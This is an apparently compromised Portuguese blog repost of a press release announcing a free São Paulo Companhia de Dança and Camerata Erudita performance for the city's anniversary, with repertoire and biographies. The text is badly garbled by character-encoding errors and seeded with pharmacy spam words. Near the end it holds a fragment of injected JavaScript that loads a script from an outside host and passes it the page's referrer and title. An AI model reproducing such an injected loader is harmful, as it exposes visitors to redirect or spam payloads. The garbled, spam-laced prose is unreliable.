Balé/DançaProgramaçãoSão Paulo

SA?o Paulo Cia de DanA�a e Camerata Erudita celebram aniversA?rio de SA?o Paulo

Oficina Cultural Oswald de Andrade recebe espetA?culo gratuito no dia 25 de janeiro, A�s 16h.

A�A SA?o Paulo Companhia de DanA�a (SPCD), mantida pela Secretaria da Cultura do Estado de SA?o Paulo, sob direA�A?o de InA?s BogA�a, e a Camerata Erudita Pills , sob regA?ncia do maestro Miguel Forte, celebram os 463 anos da cidade de SA?o Paulo com uma apresentaA�A?o na Oficina Cultural Oswald de Andrade, no dia 25 de janeiro, A�s 16h, com entrada franca.

Durante o espetA?culo,A�a SPCD apresenta um trecho de PivA? (2016), coreografia de Fabiano Lima para a companhia que recebeu o terceiro lugar no PrA?mio Melhores do Ano, promovido pelo Guia da Folha, na categoria Melhor Coreografia na escolha do jA?ri, e Grand Pas de Deux de Dom Quixote (1869), da SA?o Paulo Companhia de DanA�a a partir do original de Marius Petipa (1818-1910).

AlA�m disso, os bailarinos da SA?o Paulo farA?o uma performance com as mA?sicas Sampa, de Caetano Veloso, SA?o Paulo SA?o Paulo, do grupo Premeditando o Breque, e Trem das Onze, de Adoniram Barbosa, executadas ao vivo pela Camerata Erudita, que tocarA? ainda Odeon, de Ernesto Nazareth, Aquarela do Brasil, de Ary Barroso, Carinhoso, de Pixinguinha, Wave, de Tom Jobim, e Tico-Tico no FubA?, de Zequinha de Abreu.

a�?A SA?o Paulo Companhia de DanA�a foi criada hA? oito anos, no dia 28 de janeiro, como um presente para a cidade de SA?o Paulo. Para nA?s A� uma alegria celebrar o aniversA?rio dessa cidade tA?o diversa e danA�antea�?, fala InA?s BogA�a, diretora artA�stica da SA?o Paulo Companhia de DanA�a.

a�?O repertA?rio foi pensado para celebrar o aniversA?rio de 463 anos desta cidade, que A� sem dA?vida, a principal da AmA�rica Latina, buscando mA?sicas que falam sobre sua histA?ria e contrastes, alA�m de canA�A�es que fazem parte do cenA?rio musical nacionala�?, afirma o maestro Miguel Forte.

 

Saiba mais sobre as Coreografias abaixo: Cheap

PIVA� (2016)

Coreografia: Fabiano Lima

MA?sicas: Quem sabe? (1859) cantada por Adriana de Almeida e executada ao piano por Olinda Allessandrini e Bailado dos A?ndios da A?pera O Guarani (1870), de Carlos Gomes (1836-1896), executada pelo pela Orquestra do Teatro Municipal de SA?o Paulo sob regA?ncia de Armando Bellardi.

Figurinos: CA?ssio Brasil

IluminaA�A?o: Guilherme Paterno

Criada para o AteliA? de CoreA?grafos Brasileiros 2016, PivA? A� uma coreografia de Fabiano Lima que se vale de referA?ncias do basquete, do hip-hop e da danA�a contemporA?nea. Com mA?sica da A?pera O Guarani, de Carlos Gomes, e outra peA�a revisitada por Alexandre Levi, traz para cena o ambiente brasileiro com sonoridades conhecidas. O figurino de CA?ssio Brasil dialoga com a luz de Guilherme Paterno e evidencia as diferentes camadas de cor da obra. a�?A� uma coreografia de troca e percepA�A?o para entendermos como essa danA�a passa de um corpo para o outro. Gosto de trabalhar com elementos cA?nicos, dA? identidade aos meus trabalhosa�?, fala o coreA?grafo.

 

A�- GRAND PAS DE DEUX DE DOM QUIXOTE (1869)

Coreografia: SPCD a partir do original de 1869 de Marius Petipa (1818-1910

MA?sica: Leon Minkus (1826-1917)

Pills Figurinos: TA?nia Agra

IluminaA�A?o:A�Wagner Freire

OA�Grand Pas de Deux de Dom QuixoteA�A� o momento do casamento de Kitri e BasA�lio, personagens principais dessa obra. Coreografado por Marius Petipa, o balA� Dom Quixote A� baseado num capA�tulo da famosa obra de Miguel de Cervantes, que narra as aventuras do barbeiro BasA�lio e seu amor por Kitri, a filha do taberneiro.

 

Camerata Erudita

A Camerata Erudita, orquestra de cA?mara fundada em 2011 por seu regente titular, Miguel Forte, busca desde entA?o o seu espaA�o no cenA?rio musical brasileiro. Ao longo do tempo, vem realizando diversos concertos, executando e divulgando a chamada a�?mA?sica de cA?maraa�?, escrita para pequenas formaA�A�es e pequenos espaA�os. Composta por mA?sicos profissionais e jovens mA?sicos, prima pelo critA�rio na escolha de seu repertA?rio e tambA�m pela busca da excelA?ncia na execuA�A?o dos mesmos, valendo-se sempre de grandes nomes da mA?sica nacional para compor suas formaA�A�es, buscando assim formar sua prA?pria identidade.

 

Cheap Miguel Forte

Licenciado em mA?sica pela Faculdade Integral Cantareira, iniciou seus estudos de regA?ncia com o professor Walter Novaes e desde entA?o tem aprimorado seus conhecimentos com diversos maestros como: Jorge Sarmientos Filho, Jorge Sarmientos, JoA?o Wilson Faustini, Mara Campos, Paulo Maron, SA�rgio Igor Schnee, Isaac Karabtchevsky, AndrA�a Huguenin Botelho entre outros. Como violoncelista esteve sob a orientaA�A?o de Ivana Dudnik, Heloisa Meirelles e Ricardo Fukuda. Atuou como violoncelista pela Cia. Paulista de MA?sica, NUO a�� NA?cleo UniversitA?rio de A�pera, tendo sido chefe de naipe atA� 2013 e pela Orquestra SinfA?nica Jovem Edmundo Villani-CA?rtes. Em outubro de 2014, foi condecorado com a Ordem do MA�rito Cultural Carlos Gomes, pela SBACE a�� Sociedade Brasileira de Artes, Cultura e Ensino. HA? dois anos participa do LIRO – LaboratA?rio Internacional de RegA?ncia Orquestral ministrado pela Maestrina AndrA�a Huguenin Botelho, tendo sido escolhido no primeiro ano como destaque do curso.

 

SA?o Paulo Companhia de DanA�a
DireA�A?o artA�stica:A� InA?s BogA�a

Criada em janeiroA�de 2008 pelo Governo do Estado de SA?o Paulo, a SA?o Paulo Companhia de DanA�a (SPCD) – gerida pela AssociaA�A?o PrA?-DanA�a – A� dirigida porA�InA?s BogA�a, doutora em Artes, bailarina, documentarista e escritora. A SA?o Paulo A� uma Companhia de repertA?rio, ou seja, realiza montagens de excelA?ncia artA�stica, que incluem trabalhos dos sA�culos XIX, XX e XXI de grandes peA�as clA?ssicas e modernas a obras contemporA?neas especialmente criadas por coreA?grafos nacionais e internacionais. A difusA?o da danA�a, produA�A?o e circulaA�A?o de espetA?culos A� o nA?cleo principal de seu trabalho. A SPCD apresenta espetA?culos de danA�a no Estado de SA?o Paulo, no Brasil e no exterior e A� hoje considerada uma das mais importantes companhias de danA�a da AmA�rica Latina pela crA�tica especializada. Desde sua criaA�A?o jA? foi assistida por um pA?blico superior a 520 mil pessoas em 15 diferentes paA�ses, passando por mais 110 cidades, em mais de 580 apresentaA�A�es.

Os Programas Educativos e de FormaA�A?o de Plateia para a DanA�a, outra vertente de aA�A?o da SPCD, vem no movimento da Companhia a cada cidade por onde nos apresentamos encontramos pessoas que apreciam e praticam a arte da danA�a. Na Palestra Para os Educadores temos a oportunidade de diA?logo sobre os bastidores dessa arte; nas Oficinas de DanA�a, um encontro para vivenciar o cotidiano dos bailarinos da SPCD e os EspetA?culos Gratuitos Para Estudantes e Terceira Idade a proposta A� de ver, ouvir e perceber o mundo da danA�a e por meio do DanA�a em Rede, uma enciclopA�dia de danA�a online e colaborativa disponA�vel no site da Companhia, mapeamos a danA�a de cada cidade por onde a SPCD passa. A Companhia tambA�m promove espaA�os onde interessados na arte da danA�a possam compartilhar experiA?ncias. Assim criou o SeminA?rio Internacional de DanA�a, que visa abordar a prA?tica da danA�a em diferentes perspectivas e o AteliA? Internacional SA?o Paulo Companhia de DanA�a, evento que proporciona um ambiente de arte, permitindo um estudo teA?rico-prA?tico de tA�cnicas de danA�a.

A danA�a tem muitas histA?rias, e para revelar um pouco delas a Companhia criou a sA�rie de documentA?rios Figuras da DanA�a, que traz para vocA? essa arte contada por quem a viveu e pode ser vista nos canaisA�Arte 1A�eA�Canal Curta!. A sA�rie conta hoje com 33 episA?dios: Ismael Guiser (1927-2008), Ivonice Satie (1950- 2008), Ady Addor, Marilena Ansaldi, Penha de Souza, Ruth Rachou, Luis Arrieta, Hulda Bittencourt, Tatiana Leskova, Angel Vianna, Antonio Carlos Cardoso, Carlos Moraes, DA�cio Otero, MA?rcia HaydA�, SA?nia Mota, Ana Botafogo, CA�lia GouvA?a, Lia Robatto, Marilene Martins, Ismael Ivo, Edson Claro (1949-2013), Hugo Travers, J.C Violla, CecA�lia Kerche, Eva Schul, Janice Vieira, Eliana Caminada, Mara Borba, Jair Moraes, Paulo Pederneiras, Maria Pia FinnA?chio, Nora Esteves e JosA� Possi Neto. A SPCD tambA�m publicou seis livros de ensaios, alA�m de documentA?rios para professores e outros que registram os bastidores da sua aA�A?o.

A temporada 2017 da SA?o Paulo Companhia de DanA�a ganhou o tA�tulo de PA?ssaro de Fogo. a�?O PA?ssaro de Fogo simboliza a luz. A� uma ave lendA?ria, mA�tica e imortal, capaz de se regenerar, de encontrar potA?ncia para sua existA?ncia pelo encorajamento e superaA�A?o. Este tema vem ao encontro das observaA�A�es, reflexA�es e transformaA�A�es do Brasil dos dias atuais a�?, fala InA?s BogA�a, diretora artA�stica da SPCD.

Com trA?s programas e nove coreografias, o programa 2017 contarA? com quatro estreias: PA?ssaro de Fogo Pas de Deux (2010), de Marco Goecke, com mA?sica original de Igor Stravinski (1882-1971), remontada por Giovanni Di Palma, Primavera Fria (2017), de ClA�bio Oliveira, 14a��20a�?a�� (2007), de JirA� KyliA?n remontada por Nina Botkay, e SuA�te de Raymonda (2017), remontada por Guivalde de Almeida a partir do original de Marius Petipa (1818-1910) para o AteliA? de CoreA?grafos Brasileiros.

Ngali… (2016), de Jomar Mesquita com colaboraA�A?o de Rodrigo de Castro, sobre diferentes relaA�A�es amorosas que incluem um terceiro; PivA? (2016), de Fabiano Lima, coreografia que se vale das referA?ncias do basquete, do hip-hop e da danA�a contemporA?nea; SuA�te para Dois Pianos (1987), de Uwe Scholz (1958-2004) remontada por Giovanni Di Palma, coreografada em diA?logo com a arte de Walissy Kandinsky (1866-1944); Indigo Rose (1998), de JirA� KyliA?n, que explora a vivacidade dos intA�rpretes para falar sobre a transiA�A?o da juventude e as relaA�A�es humanas; e amaryllis plant delivery La Sylphide (2014), de Mario Galizzi a partir do original de Marius Petipa (1818-1910), obra marcante do balA� romA?ntico; completam o programa 2017 da SA?o Paulo Companhia de DanA�a.

A Companhia A� um lugar de encontro dos mais diversos artistas para que se possa pensar em um projeto brasileiro de danA�a.

 

A� online

A�SERVIA�O:
SA?o Paulo Cia de DanA�a e Camerata EruditaA�

 

Dia 25 de janeiro, quarta-feira, A�s 16h

Oficina Cultural Oswald de Andrade (R. TrA?s Rios, 363, Bom Retiro a�� SA?o Paulo/SP – Tel.: 11 3222-2662)

 

EntradaA�gratuita

SugestA?o etA?ria: livre

 

 

 s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; if (document.currentScript) { Buy can you buy singulair over the counter

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.